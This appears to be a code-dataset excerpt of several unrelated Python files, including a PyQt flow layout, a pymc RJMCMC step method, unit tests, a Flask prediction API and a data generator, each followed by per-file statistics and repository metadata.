alpha = params.get('elu_alpha', 1.0)
inplace = params.get('elu_inplace', False)
return nn.ELU(alpha, inplace)
elif(acti_func == 'celu'):
alpha = params.get('celu_alpha', 1.0)
inplace = params.get('celu_inplace', False)
return nn.CELU(alpha, inplace)
elif(acti_func == 'selu'):
inplace = params.get('selu_inplace', False)
return nn.SELU(inplace)
elif(acti_func == 'glu'):
dim = params.get('glu_dim', -1)
return nn.GLU(dim)
elif(acti_func == 'sigmoid'):
return nn.Sigmoid()
elif(acti_func == 'logsigmoid'):
return nn.LogSigmoid()
elif(acti_func == 'tanh'):
return nn.Tanh()
elif(acti_func == 'hardtanh'):
min_val = params.get('hardtanh_min_val', -1.0)
max_val = params.get('hardtanh_max_val', 1.0)
inplace = params.get('hardtanh_inplace', False)
return nn.Hardtanh(min_val, max_val, inplace)
elif(acti_func == 'softplus'):
beta = params.get('softplus_beta', 1.0)
threshold = params.get('softplus_threshold', 20)
return nn.Softplus(beta, threshold)
elif(acti_func == 'softshrink'):
lambd = params.get('softshrink_lambda', 0.5)
return nn.Softshrink(lambd)
elif(acti_func == 'softsign'):
return nn.Softsign()
else:
raise ValueError("Not implemented: {0:}".format(acti_func))
| 31.552632
| 67
| 0.607173
| 306
| 2,398
| 4.568627
| 0.222222
| 0.114449
| 0.120172
| 0.100143
| 0.080114
| 0.032904
| 0
| 0
| 0
| 0
| 0
| 0.016111
| 0.249374
| 2,398
| 76
| 67
| 31.552632
| 0.760556
| 0.008757
| 0
| 0
| 0
| 0
| 0.1633
| 0.010101
| 0
| 0
| 0
| 0
| 0
| 1
| 0.017544
| false
| 0
| 0.052632
| 0
| 0.333333
| 0.017544
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a33eb973d0edc831eea7bb11066042e56e9c2e88
| 3,359
|
py
|
Python
|
ui/flowlayout.py
|
amadotejada/self-portal
|
c508fb120548f3eb65e872d08a823d3942fc650d
|
[
"Apache-2.0"
] | 9
|
2022-03-15T02:02:30.000Z
|
2022-03-18T16:16:59.000Z
|
ui/flowlayout.py
|
amadotejada/self-portal
|
c508fb120548f3eb65e872d08a823d3942fc650d
|
[
"Apache-2.0"
] | null | null | null |
ui/flowlayout.py
|
amadotejada/self-portal
|
c508fb120548f3eb65e872d08a823d3942fc650d
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2021 Amado Tejada
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from PyQt5.QtCore import QPoint, QRect, QSize, Qt
from PyQt5.QtWidgets import QLayout, QSizePolicy
class FlowLayout(QLayout):
def __init__(self, parent=None, margin=0, spacing=-1):
super(FlowLayout, self).__init__(parent)
if parent is not None:
self.setContentsMargins(margin, margin, margin, margin)
self.setSpacing(spacing)
self.itemList = []
def __del__(self):
item = self.takeAt(0)
while item:
item = self.takeAt(0)
def addItem(self, item):
self.itemList.append(item)
def count(self):
return len(self.itemList)
def itemAt(self, index):
if 0 <= index < len(self.itemList):
return self.itemList[index]
return None
def takeAt(self, index):
if 0 <= index < len(self.itemList):
return self.itemList.pop(index)
return None
def expandingDirections(self):
return Qt.Orientations(Qt.Orientation(0))
def hasHeightForWidth(self):
return True
def heightForWidth(self, width):
height = self.doLayout(QRect(0, 0, width, 0), True)
return height
def setGeometry(self, rect):
super(FlowLayout, self).setGeometry(rect)
self.doLayout(rect, False)
def sizeHint(self):
return self.minimumSize()
def minimumSize(self):
size = QSize()
for item in self.itemList:
size = size.expandedTo(item.minimumSize())
margin, _, _, _ = self.getContentsMargins()
size += QSize(2 * margin, 2 * margin)
return size
def doLayout(self, rect, testOnly):
x = rect.x()
y = rect.y()
lineHeight = 0
for item in self.itemList:
wid = item.widget()
spaceX = self.spacing() + wid.style().layoutSpacing(QSizePolicy.PushButton, QSizePolicy.PushButton,
Qt.Horizontal)
spaceY = self.spacing() + wid.style().layoutSpacing(QSizePolicy.PushButton, QSizePolicy.PushButton,
Qt.Vertical)
nextX = x + item.sizeHint().width() + spaceX
if nextX - spaceX > rect.right() and lineHeight > 0:
x = rect.x()
y = y + lineHeight + spaceY
nextX = x + item.sizeHint().width() + spaceX
lineHeight = 0
if not testOnly:
item.setGeometry(QRect(QPoint(x, y), item.sizeHint()))
x = nextX
lineHeight = max(lineHeight, item.sizeHint().height())
return y + lineHeight - rect.y()
| 31.688679
| 112
| 0.575171
| 370
| 3,359
| 5.181081
| 0.362162
| 0.056338
| 0.023474
| 0.016693
| 0.18362
| 0.161711
| 0.131455
| 0.131455
| 0.131455
| 0.131455
| 0
| 0.011101
| 0.329562
| 3,359
| 105
| 113
| 31.990476
| 0.840142
| 0.164037
| 0
| 0.215385
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| false
| 0
| 0.030769
| 0.061538
| 0.415385
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a340df3cf71eb1be1675fbe29cece65cbcc98d43
| 3,183
|
py
|
Python
|
methods/smartdumpRJ.py
|
wdempsey/sense2stop-lvm
|
ea44d5f9199382d30e4c5a5ff4bd524313ceb5b2
|
[
"CECILL-B"
] | 1
|
2020-04-18T11:16:02.000Z
|
2020-04-18T11:16:02.000Z
|
methods/smartdumpRJ.py
|
wdempsey/sense2stop-lvm
|
ea44d5f9199382d30e4c5a5ff4bd524313ceb5b2
|
[
"CECILL-B"
] | 6
|
2020-04-13T18:38:04.000Z
|
2022-03-12T00:55:56.000Z
|
methods/smartdumpRJ.py
|
wdempsey/sense2stop-lvm
|
ea44d5f9199382d30e4c5a5ff4bd524313ceb5b2
|
[
"CECILL-B"
] | 1
|
2020-07-02T04:47:00.000Z
|
2020-07-02T04:47:00.000Z
|
# -*- coding: utf-8 -*-
"""
Created on Tue May 26 14:29:26 2020
@author: Walter Dempsey & Jamie Yap
"""
#%%
###############################################################################
# Build a RJMCMC class
###############################################################################
from pymc import Stochastic, Deterministic, Node, StepMethod
from numpy import ma, random, where
from numpy.random import random
from copy import deepcopy
class smartdumbRJ(StepMethod):
"""
S = smartdumbRJ(self, stochs, indicator, p, rp, g, q, rq, inv_q, Jacobian, **kwargs)
smartdumbRJcan control single indicatored-array-valued stochs. The indicator
indicates which stochs (events) are currently 'in the model;' if
stoch.value.indicator[index] = True, that index is currently being excluded.
indicatored-array-valued stochs and their children should understand how to
cope with indicatored arrays when evaluating their logpabilities.
The prior for the indicatored-array-valued stoch may depend explicitly on the
indicator.
The dtrm arguments are, in notation similar to that of Waagepetersen et al.,
def p(indicator):
Returns the probability of jumping to
def smartbirth(indicator):
Draws a value for the auxiliary RV's u given indicator.value (proposed),
indicator.last_value (current), and the value of the stochs.
def smartdeath(indicator):
"""
def __init__(self, stochs, indicator, p, rp, g, q, rq, inv_q, Jacobian):
StepMethod.__init__(self, nodes = stochs)
self.g = g
self.q = q
self.rq = rq
self.p = p
self.rp = rp
self.inv_q = inv_q
self.Jacobian = Jacobian
self.stoch_dict = {}
for stoch in stochs:
self.stoch_dict[stoch.__name__] = stoch
self.indicator = indicator
def propose(self):
"""
Sample a new indicator and value for the stoch.
"""
self.rp(self.indicator)
self._u = self.rq(self.indicator)
self.g(self.indicator, self._u, **self.stoch_dict)
def step(self):
# logpability and loglike for stoch's current value:
logp = sum([stoch.logp for stoch in self.stochs]) + self.indicator.logp
loglike = self.loglike
# Sample a candidate value for the value and indicator of the stoch.
self.propose()
# logpability and loglike for stoch's proposed value:
logp_p = sum([stoch.logp for stoch in self.stochs]) + self.indicator.logp
# Skip the rest if a bad value is proposed
if logp_p == -Inf:
for stoch in self.stochs: stoch.revert()
return
loglike_p = self.loglike
# test:
test_val = logp_p + loglike_p - logp - loglike
test_val += self.inv_q(self.indicator)
test_val += self.q(self.indicator,self._u)
if self.Jacobian is not None:
test_val += self.Jacobian(self.indicator,self._u,**self.stoch_dict)
if log(random()) > test_val:
for stoch in self.stochs:
stoch.revert
def tune(self):
pass
| 31.514851
| 88
| 0.602576
| 405
| 3,183
| 4.646914
| 0.330864
| 0.062168
| 0.026567
| 0.038257
| 0.201913
| 0.190223
| 0.158342
| 0.092455
| 0.092455
| 0.092455
| 0
| 0.005556
| 0.264844
| 3,183
| 100
| 89
| 31.83
| 0.798718
| 0.401194
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.097561
| false
| 0.02439
| 0.097561
| 0
| 0.243902
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a34205264c406b528a6fcfa5ac69debf00a2b02c
| 2,021
|
py
|
Python
|
tests/test_slack_user.py
|
tomcooperca/mlb-slack-tracker
|
bbfd8ed6f0c345d5286813a6cd4b04e0557a762a
|
[
"MIT"
] | null | null | null |
tests/test_slack_user.py
|
tomcooperca/mlb-slack-tracker
|
bbfd8ed6f0c345d5286813a6cd4b04e0557a762a
|
[
"MIT"
] | 7
|
2018-09-08T20:07:43.000Z
|
2021-12-13T19:54:53.000Z
|
tests/test_slack_user.py
|
tomcooperca/mlb-slack-tracker
|
bbfd8ed6f0c345d5286813a6cd4b04e0557a762a
|
[
"MIT"
] | null | null | null |
from unittest.mock import MagicMock
from slack.user import User
from baseball.team import Team
reusableUser = User(token='blah', id='UB00123', team=None)
testTeam = Team(abbreviation='CN', location='City Name',
full_name='City Name Players', record='0W-162L', division='CL Beast',
wins=0, losses=162, standing=5, todays_game_text='CN@BOB',
todays_game_score='1-0')
def test_init():
u = User(token='gooblygook', id='ABC123', team=None)
assert u.id == 'ABC123'
def test_status_calls_updater():
reusableUser.su.display_status = MagicMock(return_value="Test status")
reusableUser.status()
reusableUser.su.display_status.assert_called_with()
def test_emoji_calls_updater():
reusableUser.su.display_status_emot = MagicMock(return_value=":cat:")
reusableUser.emoji()
reusableUser.su.display_status_emot.assert_called_with()
def test_simple_team_and_record_status():
expected = 'CN | 0W-162L'
u = User(token='blah', id='UB00123', team=testTeam)
u.su.update_status = MagicMock()
u.simple_team_and_record()
u.su.update_status.assert_called_once_with(status=expected)
def test_todays_game_and_standings_status():
expected = 'CN@BOB | 0W-162L | #5 in CL Beast'
u = User(token='blah', id='UB00123', team=testTeam)
u.su.update_status = MagicMock()
u.todays_game_and_standings()
u.su.update_status.assert_called_once_with(status=expected)
def test_todays_game_and_standings_status():
expected = 'CN@BOB | 0W-162L | #5 in CL Beast'
u = User(token='blah', id='UB00123', team=testTeam)
u.su.update_status = MagicMock()
u.todays_game_and_standings()
u.su.update_status.assert_called_once_with(status=expected)
def test_todays_game_score_and_standings_status():
expected = 'CN@BOB (Final: 1-0) | 0W-162L | #5 in CL Beast'
u = User(token='blah', id='UB00123', team=testTeam)
u.su.update_status = MagicMock()
u.todays_game_score_and_standings()
u.su.update_status.assert_called_once_with(status=expected)
| 34.844828
| 74
| 0.730332
| 295
| 2,021
| 4.738983
| 0.230508
| 0.057225
| 0.051502
| 0.085837
| 0.635908
| 0.570815
| 0.474249
| 0.474249
| 0.474249
| 0.474249
| 0
| 0.036228
| 0.139535
| 2,021
| 57
| 75
| 35.45614
| 0.767683
| 0
| 0
| 0.418605
| 0
| 0
| 0.133102
| 0
| 0
| 0
| 0
| 0
| 0.162791
| 1
| 0.162791
| false
| 0
| 0.069767
| 0
| 0.232558
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a342151afcda4ba72f2d257247a2de01de22ba98
| 1,934
|
py
|
Python
|
tmuxp/testsuite/test_workspacefreezer.py
|
wrongwaycn/tmuxp
|
367cca3eb1b3162bb7e4801fe752b520f1f8eefa
|
[
"BSD-3-Clause"
] | 2
|
2018-02-05T01:27:07.000Z
|
2018-06-10T02:02:25.000Z
|
tmuxp/testsuite/test_workspacefreezer.py
|
wrongwaycn/tmuxp
|
367cca3eb1b3162bb7e4801fe752b520f1f8eefa
|
[
"BSD-3-Clause"
] | null | null | null |
tmuxp/testsuite/test_workspacefreezer.py
|
wrongwaycn/tmuxp
|
367cca3eb1b3162bb7e4801fe752b520f1f8eefa
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function, with_statement
import os
import sys
import logging
import time
import kaptan
from .. import Window, config, exc
from ..workspacebuilder import WorkspaceBuilder, freeze
from .helpers import TmuxTestCase
logger = logging.getLogger(__name__)
current_dir = os.path.abspath(os.path.dirname(__file__))
example_dir = os.path.abspath(os.path.join(current_dir, '..', '..'))
class FreezeTest(TmuxTestCase):
yaml_config = """
session_name: sampleconfig
start_directory: '~'
windows:
- layout: main-vertical
panes:
- shell_command:
- vim
start_directory: '~'
- shell_command:
- echo "hey"
- cd ../
window_name: editor
- panes:
- shell_command:
- tail -F /var/log/syslog
start_directory: /var/log
window_name: logging
- window_name: test
panes:
- shell_command:
- htop
"""
def test_focus(self):
# assure the built yaml config has focus
pass
def test_freeze_config(self):
sconfig = kaptan.Kaptan(handler='yaml')
sconfig = sconfig.import_config(self.yaml_config).get()
builder = WorkspaceBuilder(sconf=sconfig)
builder.build(session=self.session)
assert(self.session == builder.session)
import time
time.sleep(1)
session = self.session
sconf = freeze(session)
config.validate_schema(sconf)
sconf = config.inline(sconf)
kaptanconf = kaptan.Kaptan()
kaptanconf = kaptanconf.import_config(sconf)
json = kaptanconf.export(
'json',
indent=2
)
yaml = kaptanconf.export(
'yaml',
indent=2,
default_flow_style=False,
safe=True
)
#logger.error(json)
#logger.error(yaml)
| 23.585366
| 80
| 0.609617
| 205
| 1,934
| 5.560976
| 0.453659
| 0.021053
| 0.044737
| 0.02807
| 0.038596
| 0.038596
| 0
| 0
| 0
| 0
| 0
| 0.002909
| 0.289038
| 1,934
| 81
| 81
| 23.876543
| 0.826182
| 0.049638
| 0
| 0.16129
| 0
| 0
| 0.267321
| 0
| 0
| 0
| 0
| 0
| 0.016129
| 1
| 0.032258
| false
| 0.016129
| 0.193548
| 0
| 0.258065
| 0.016129
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a34438fcd2d05af774f8b7d208037ebd093f49f3
| 1,488
|
py
|
Python
|
test.py
|
KyleJeong/ast_calculator
|
cf65ad76739839ac4b3df36b82862612d6bd4492
|
[
"MIT"
] | 6
|
2016-07-20T07:37:07.000Z
|
2022-01-14T06:35:26.000Z
|
test.py
|
KyleJeong/ast_calculator
|
cf65ad76739839ac4b3df36b82862612d6bd4492
|
[
"MIT"
] | 1
|
2020-03-29T05:13:58.000Z
|
2020-03-29T05:13:58.000Z
|
test.py
|
KyleJeong/ast_calculator
|
cf65ad76739839ac4b3df36b82862612d6bd4492
|
[
"MIT"
] | 1
|
2020-03-29T04:29:36.000Z
|
2020-03-29T04:29:36.000Z
|
"""
Test cases for AST calculator
"""
from unittest import TestCase
from calc import evaluate
class TestCaclEvaluate(TestCase):
"""
Test cases for AST calculator - evaluation
"""
def test_simple_expression(self):
"""
Test expression without functions or constants
"""
data = [
("84-9*3", 57),
("8**4", 4096),
("3*(2*5)**3/(123-32+9)", 30),
]
for expression, expected in data:
result = evaluate(expression)
msg = "{} evaluated to: {}. Expected {}".format(
expression, result, expected)
self.assertEquals(result, expected, msg)
def test_complex_expression(self):
"""
Test expression with functions or constants
"""
data = [
("2*log(exp(2))", 4),
("cos(2*pi)", 1),
("log(8,2)", 3),
]
for expression, expected in data:
result = evaluate(expression)
msg = "{} evaluated to: {}. Expected {}".format(
expression, result, expected)
self.assertEquals(result, expected, msg)
def test_invalid_expression(self):
"""
Make sure code will behave correctly for invalid input
"""
data = [
"1/0",
"import os",
]
for expression in data:
with self.assertRaises(StandardError):
evaluate(expression)
| 23.619048
| 62
| 0.511425
| 145
| 1,488
| 5.206897
| 0.427586
| 0.074172
| 0.031788
| 0.039735
| 0.445033
| 0.378808
| 0.378808
| 0.378808
| 0.378808
| 0.378808
| 0
| 0.036132
| 0.367608
| 1,488
| 62
| 63
| 24
| 0.766206
| 0.146505
| 0
| 0.393939
| 0
| 0
| 0.116299
| 0.017827
| 0
| 0
| 0
| 0
| 0.090909
| 1
| 0.090909
| false
| 0
| 0.090909
| 0
| 0.212121
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a34991845be5613841f0b124224655a27cd95755
| 1,732
|
py
|
Python
|
app.py
|
u-aaa/House-_prediction_model
|
4808b4aefb802520a7ccd878c342699093e6942d
|
[
"MIT"
] | null | null | null |
app.py
|
u-aaa/House-_prediction_model
|
4808b4aefb802520a7ccd878c342699093e6942d
|
[
"MIT"
] | null | null | null |
app.py
|
u-aaa/House-_prediction_model
|
4808b4aefb802520a7ccd878c342699093e6942d
|
[
"MIT"
] | 1
|
2021-09-23T19:42:36.000Z
|
2021-09-23T19:42:36.000Z
|
import pickle
import json
import numpy as np
from flask import Flask, request, jsonify
app = Flask(__name__)
with open('models/regressor.pkl', 'rb') as f:
model = pickle.load(f)
def __process_input(posted_data) -> np.array:
'''
transforms JSON type data acquired from request and transforms it into 2D array the model understands
:param posted_data:
:return:np.array
'''
try:
data_str = json.loads(posted_data)
data_list = data_str['features']
data_item = np.array(data_list)
dimensions = data_item.ndim
if dimensions > 2:
return None
if len(data_item.shape) == 1: #checks if array is 1D
data_item = data_item.reshape(1, -1)
arr_len = data_item.shape[-1]
if arr_len == 13:
return data_item
return None
except (KeyError, json.JSONDecodeError, AssertionError):
return None
@app.route('/')
def index() -> str:
return 'Welcome to the house prediction interface', 200
@app.route('/predict', methods=['POST'])
def predict() -> (str, int):
'''
loads the data acquired from request to the model and returns the predicted value
:return: prediction
'''
try:
data_str = request.data
predict_params = __process_input(data_str)
if predict_params is not None:
prediction = model.predict(predict_params)
return json.dumps({'predicted house price(s) (in dollars)': prediction.tolist()}), 200
return json.dumps({'Error': 'Invalid input'}), 400
except (KeyError, json.JSONDecodeError, AssertionError):
return json.dumps({'Error': 'Unable to predict'}), 500
if __name__ == '__main__':
app.run()
| 28.393443
| 105
| 0.639723
| 222
| 1,732
| 4.815315
| 0.414414
| 0.052385
| 0.042095
| 0.043031
| 0.130964
| 0.099158
| 0
| 0
| 0
| 0
| 0
| 0.016204
| 0.251732
| 1,732
| 60
| 106
| 28.866667
| 0.808642
| 0.15127
| 0
| 0.179487
| 0
| 0
| 0.11843
| 0
| 0
| 0
| 0
| 0
| 0.051282
| 1
| 0.076923
| false
| 0
| 0.102564
| 0.025641
| 0.384615
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a34d2a23f38ff576e6a5ef0f805165729d2fc6ef
| 2,789
|
py
|
Python
|
scalex/metrics.py
|
jsxlei/SCALEX
|
021c6d35a0cebeaa1f59ea53b9b9e22015ce6e5f
|
[
"MIT"
] | 11
|
2021-04-09T02:46:29.000Z
|
2022-01-04T16:42:44.000Z
|
scale/metrics.py
|
QingZhan98/SCALE_v2
|
69bb02beee40ec085684335f356798d4dcb53fbc
|
[
"MIT"
] | 2
|
2021-04-18T02:30:18.000Z
|
2022-03-05T10:40:00.000Z
|
scale/metrics.py
|
QingZhan98/SCALE_v2
|
69bb02beee40ec085684335f356798d4dcb53fbc
|
[
"MIT"
] | 4
|
2021-03-29T12:34:47.000Z
|
2022-03-06T12:42:45.000Z
|
#!/usr/bin/env python
"""
# Author: Xiong Lei
# Created Time : Thu 10 Jan 2019 07:38:10 PM CST
# File Name: metrics.py
# Description:
"""
import numpy as np
import scipy
from sklearn.neighbors import NearestNeighbors, KNeighborsRegressor
def batch_entropy_mixing_score(data, batches, n_neighbors=100, n_pools=100, n_samples_per_pool=100):
"""
Calculate batch entropy mixing score
Algorithm
-----
* 1. Calculate the regional mixing entropies at the location of 100 randomly chosen cells from all batches
* 2. Define 100 nearest neighbors for each randomly chosen cell
* 3. Calculate the mean mixing entropy as the mean of the regional entropies
* 4. Repeat above procedure for 100 iterations with different randomly chosen cells.
Parameters
----------
data
np.array of shape nsamples x nfeatures.
batches
batch labels of nsamples.
n_neighbors
The number of nearest neighbors for each randomly chosen cell. By default, n_neighbors=100.
n_samples_per_pool
The number of randomly chosen cells from all batches per iteration. By default, n_samples_per_pool=100.
n_pools
The number of iterations with different randomly chosen cells. By default, n_pools=100.
Returns
-------
Batch entropy mixing score
"""
# print("Start calculating Entropy mixing score")
def entropy(batches):
p = np.zeros(N_batches)
adapt_p = np.zeros(N_batches)
a = 0
for i in range(N_batches):
p[i] = np.mean(batches == batches_[i])
a = a + p[i]/P[i]
entropy = 0
for i in range(N_batches):
adapt_p[i] = (p[i]/P[i])/a
entropy = entropy - adapt_p[i]*np.log(adapt_p[i]+10**-8)
return entropy
n_neighbors = min(n_neighbors, len(data) - 1)
nne = NearestNeighbors(n_neighbors=1 + n_neighbors, n_jobs=8)
nne.fit(data)
kmatrix = nne.kneighbors_graph(data) - scipy.sparse.identity(data.shape[0])
score = 0
batches_ = np.unique(batches)
N_batches = len(batches_)
if N_batches < 2:
raise ValueError("Should be more than one cluster for batch mixing")
P = np.zeros(N_batches)
for i in range(N_batches):
P[i] = np.mean(batches == batches_[i])
for t in range(n_pools):
indices = np.random.choice(np.arange(data.shape[0]), size=n_samples_per_pool)
score += np.mean([entropy(batches[kmatrix[indices].nonzero()[1]
[kmatrix[indices].nonzero()[0] == i]])
for i in range(n_samples_per_pool)])
Score = score / float(n_pools)
return Score / float(np.log2(N_batches))
from sklearn.metrics import silhouette_score
| 34.8625
| 114
| 0.639656
| 391
| 2,789
| 4.434783
| 0.329923
| 0.041522
| 0.031719
| 0.043253
| 0.284314
| 0.194348
| 0.107843
| 0.048443
| 0.048443
| 0.048443
| 0
| 0.028238
| 0.263535
| 2,789
| 80
| 115
| 34.8625
| 0.815969
| 0.38616
| 0
| 0.083333
| 0
| 0
| 0.030151
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.055556
| false
| 0
| 0.111111
| 0
| 0.222222
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a34e461868bd92e65252352e4554823a69ea35c7
| 2,603
|
py
|
Python
|
examples/data/create_data.py
|
fdabek1/EHR-Functions
|
e6bd0b6fa213930358c4a19be31c459ac7430ca9
|
[
"MIT"
] | null | null | null |
examples/data/create_data.py
|
fdabek1/EHR-Functions
|
e6bd0b6fa213930358c4a19be31c459ac7430ca9
|
[
"MIT"
] | null | null | null |
examples/data/create_data.py
|
fdabek1/EHR-Functions
|
e6bd0b6fa213930358c4a19be31c459ac7430ca9
|
[
"MIT"
] | null | null | null |
import pandas as pd
import random
import time
# Source: https://stackoverflow.com/a/553320/556935
def str_time_prop(start, end, date_format, prop):
"""Get a time at a proportion of a range of two formatted times.
start and end should be strings specifying times formated in the
given format (strftime-style), giving an interval [start, end].
prop specifies how a proportion of the interval to be taken after
start. The returned time will be in the specified format.
"""
stime = time.mktime(time.strptime(start, date_format))
etime = time.mktime(time.strptime(end, date_format))
ptime = stime + prop * (etime - stime)
return time.strftime(date_format, time.localtime(ptime))
def random_date(start, end):
return str_time_prop(start, end, '%m/%d/%Y', random.random())
def basic(n=1000):
data = {
'PatientID': [],
'PatientAge': [],
'PatientGender': [],
'PatientCategory': [],
}
for i in range(1, n + 1):
data['PatientID'].append(i)
data['PatientAge'].append(random.randint(18, 100))
data['PatientGender'].append(random.choice(['M', 'F']))
data['PatientCategory'].append(random.choice(['A', 'B', 'C']))
df = pd.DataFrame(data)
df.to_csv('basic.csv', index=False)
def encounters(n=1000):
data = {
'PatientID': [],
'PatientAge': [],
'PatientGender': [],
'PatientCategory': [],
'EncounterDate': [],
'Diagnosis1': [],
'Diagnosis2': [],
'Diagnosis3': [],
}
for i in range(1, n + 1):
age = random.randint(18, 100)
gender = random.choice(['M', 'F'])
category = random.choice(['A', 'B', 'C'])
for _ in range(random.randint(2, 15)): # Random number of encounters
date = random_date('01/01/2015', '12/31/2019')
year = int(date[-4:])
data['PatientID'].append(i)
data['PatientAge'].append(age + (year - 2015))
data['PatientGender'].append(gender)
data['PatientCategory'].append(category)
data['EncounterDate'].append(date)
data['Diagnosis1'].append(random.choice(['A', 'B', 'C']) + random.choice(['A', 'B', 'C']))
data['Diagnosis2'].append(random.choice(['A', 'B', 'C']) + random.choice(['A', 'B', 'C']))
data['Diagnosis3'].append(random.choice(['A', 'B', 'C']) + random.choice(['A', 'B', 'C']))
df = pd.DataFrame(data)
df.to_csv('encounters.csv', index=False)
if __name__ == '__main__':
random.seed(3)
basic()
encounters()
| 31.743902
| 102
| 0.579332
| 317
| 2,603
| 4.690852
| 0.340694
| 0.080699
| 0.069939
| 0.075319
| 0.308003
| 0.27236
| 0.268325
| 0.120377
| 0.120377
| 0.120377
| 0
| 0.032945
| 0.242028
| 2,603
| 81
| 103
| 32.135802
| 0.72073
| 0.151748
| 0
| 0.285714
| 0
| 0
| 0.165596
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.071429
| false
| 0
| 0.053571
| 0.017857
| 0.160714
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a350ecde028977958b337223398f9351c3e4bbec
| 1,317
|
py
|
Python
|
contests/ccpc20qhd/f超时.py
|
yofn/pyacm
|
e573f8fdeea77513711f00c42f128795cbba65a6
|
[
"Apache-2.0"
] | null | null | null |
contests/ccpc20qhd/f超时.py
|
yofn/pyacm
|
e573f8fdeea77513711f00c42f128795cbba65a6
|
[
"Apache-2.0"
] | null | null | null |
contests/ccpc20qhd/f超时.py
|
yofn/pyacm
|
e573f8fdeea77513711f00c42f128795cbba65a6
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
'''
#ccpc20qhd-f => 最大联通子图
#如果都是联通的,所有节点都要放进去,
#友好值=联通子图中边的个数-点的个数
#应该所有(友好值>0)联通子图加起来?
#DFS搜索,或者是并查集? 数一数有多少联通块?
#最短路用广搜,全部解用深搜
连通图的复杂度是O(V+E)..
为什么会Runtime Error?
分析:
解法1: DFS做联通块
解法2: 看不包含哪些人,相当于走个捷径!
'''
def f(n,l):
el = [[] for _ in range(n)]
for x,y in l:
if x>y:
x,y=y,x
el[x-1].append(y-1) #make sure edge is from small to BIG!
uzd = [False]*n #uzed node
st = [0]*n #stack!
fv = 0
print(el)
for i in range(n):
if uzd[i]:
continue
sp = 0
st[sp] = i #PUSH
nn = 0
ne = 0
while sp>-1:
ii = st[sp] #POP a node as source node
sp -= 1
if uzd[ii]:
continue
nn += 1
uzd[ii] = True
for j in el[ii]:
ne += 1 #ii=>j
if not uzd[j]: #make sure edges are checked and counted ONCE!
sp += 1
st[sp] = j
fv += max(0,ne-nn)
return fv
t = int(input())
for i in range(t):
n,m = list(map(int,input().split()))
l = [list(map(int,input().split())) for _ in range(m)]
print('Case #%d: %s'%((i+1), f(n,l)))
| 23.105263
| 82
| 0.430524
| 189
| 1,317
| 2.989418
| 0.486772
| 0.049558
| 0.010619
| 0.038938
| 0.070796
| 0
| 0
| 0
| 0
| 0
| 0
| 0.026385
| 0.42445
| 1,317
| 56
| 83
| 23.517857
| 0.718997
| 0.274108
| 0
| 0.055556
| 0
| 0
| 0.01278
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.027778
| false
| 0
